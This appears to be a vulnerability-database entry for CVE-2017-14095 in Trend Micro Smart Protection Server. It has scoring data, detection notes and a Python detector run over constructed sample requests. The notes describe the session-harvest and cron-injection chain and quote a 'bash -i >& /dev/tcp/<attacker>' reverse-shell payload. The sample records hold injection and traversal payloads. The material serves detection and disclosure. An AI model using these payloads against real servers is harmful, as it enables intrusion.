CVE-2017-14095
Published: 2018-01-19
Priority: P2 (62) · Severity: high · CVSS 3.0 base score: 8.1
Vector: AV:N / AC:H / PR:N / UI:N / S:U / C:H / I:H / A:H
Exploit: available
EPSS: 12.48% (95.7th percentile)
A vulnerability in Trend Micro Smart Protection Server (Standalone) versions 3.2 and below could allow an attacker to perform remote command execution via a local file inclusion on a vulnerable system.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| trend_micro | trend_micro_smart_protection_server | — | — |
| trendmicro | smart_protection_server | <= 3.2 | — |
Detection & IOCs (extracted from sources)
- Monitor unauthenticated HTTP GET requests to /widget/repository/log/diagnostic.log — attackers use this to harvest active session IDs without credentials.
- Detect POST requests to /php/admin_update_program.php where the hidTimingMin parameter contains cron-injection patterns (e.g., multiple asterisks followed by a shell command and a '#' comment terminator).
- Alert on modifications to /var/spool/cron/webserv, especially entries injected via the web application process (webserv user), as this is the cron file written by the vulnerable admin_update_program.php script.
- Detect HTTP requests to /widget/inc/widget_package_manager.php with user-supplied path traversal or LFI payloads in parameters; the script appends 'PoolManager.php' to user input passed to require_once.
- Look for the string 'MSG_UPDATE_UPDATE_SCHEDULE' in HTTP responses to POST requests targeting admin_update_program.php — its presence confirms successful cron job injection by the exploit.
- Detect outbound reverse shell connections from the web server process (webserv) to external IPs over arbitrary high ports, consistent with 'bash -i >& /dev/tcp/<attacker>/<port> 0>&1' payloads.
- Note: the LFI vulnerability (CVE-2017-14095) in widget_package_manager.php has a restriction: the application appends 'PoolManager.php' to the attacker-supplied filename, which must be accounted for in any exploit or detection signature.
- Note: the cron injection and session hijacking exploits chain together — the attacker first harvests a session token from the unauthenticated log endpoint, then uses it to authenticate the POST to admin_update_program.php. Detection must account for this two-step chain.
- Note: the affected version confirmed in testing is Trend Micro Smart Protection Server 3.2 (Build 1085); other versions may also be affected but were not tested.
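The request-level rules above (unauthenticated reads of diagnostic.log, cron-shaped hidTimingMin values, traversal in widget_package_manager.php parameters) as a small detector run over constructed proxy/WAF records. This is an added example, not code from the page, Trend Micro or Core Security; the record shape and the parameter name "pkg" are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote

# Endpoints named in the page's detection notes.
LOG_PATH = "/widget/repository/log/diagnostic.log"
CRON_PATH = "/php/admin_update_program.php"
LFI_PATH = "/widget/inc/widget_package_manager.php"

# Cron-injection shape from the page: several "*" fields, a command, then a "#" terminator.
CRON_INJECT = re.compile(r"(\*\s+){3,}\S.*#")
TRAVERSAL = re.compile(r"\.\./|\.\.\\")

def _params(record):
    """Merge query-string and body parameters; decode a second time to catch double-encoding."""
    merged = {}
    for raw in (record.get("query", ""), record.get("body", "")):
        for key, vals in parse_qs(raw, keep_blank_values=True).items():
            merged.setdefault(key, []).extend(unquote(v) for v in vals)
    return merged

def inspect(record):
    """Return (rule, detail) findings for one request record."""
    findings = []
    method, path, params = record["method"].upper(), record["path"], _params(record)
    if method == "GET" and path == LOG_PATH:
        findings.append(("session-log-exposure", f"{record['src']} read {LOG_PATH}"))
    if method == "POST" and path == CRON_PATH:
        for val in params.get("hidTimingMin", []):
            if CRON_INJECT.search(val):
                findings.append(("cron-injection", f"hidTimingMin={val!r}"))
    if path == LFI_PATH:  # any parameter: traversal or a NUL byte never belongs in a file name
        for key, vals in params.items():
            for val in vals:
                if TRAVERSAL.search(val) or "\x00" in val:
                    findings.append(("lfi-traversal", f"{key}={val!r}"))
    return findings

def scan(records):
    return [(r["src"], rule, detail) for r in records for rule, detail in inspect(r)]

# Constructed sample records (not real traffic); "pkg" is a hypothetical parameter name.
SAMPLE = [
    {"src": "10.0.0.5", "method": "GET", "path": LOG_PATH, "query": "", "body": ""},
    {"src": "10.0.0.5", "method": "POST", "path": CRON_PATH, "query": "",
     "body": "hidTimingMin=%2A+%2A+%2A+%2A+%2A+%2Ftmp%2Fx+%23&hidTimingHour=0"},
    {"src": "10.0.0.9", "method": "POST", "path": CRON_PATH, "query": "", "body": "hidTimingMin=30"},
    {"src": "10.0.0.7", "method": "GET", "path": LFI_PATH, "query": "pkg=..%2F..%2Ftmp%2Fx%00", "body": ""},
    {"src": "10.0.0.2", "method": "GET", "path": "/index.php", "query": "", "body": ""},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Correlating the first two findings by source address (the same client reading the log, then posting to admin_update_program.php) is what surfaces the two-step chain the notes describe.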
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.0 | 8.1 | HIGH | CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 6.8 | MEDIUM | AV:N/AC:M/Au:N/C:P/I:P/A:P |
No detection rules found.
No writeups or analysis indexed.
References
- http://www.securityfocus.com/bid/102275
- https://success.trendmicro.com/solution/1118992
- https://www.coresecurity.com/advisories/trend-micro-smart-protection-server-multiple-vulnerabilities
- https://www.exploit-db.com/exploits/43388/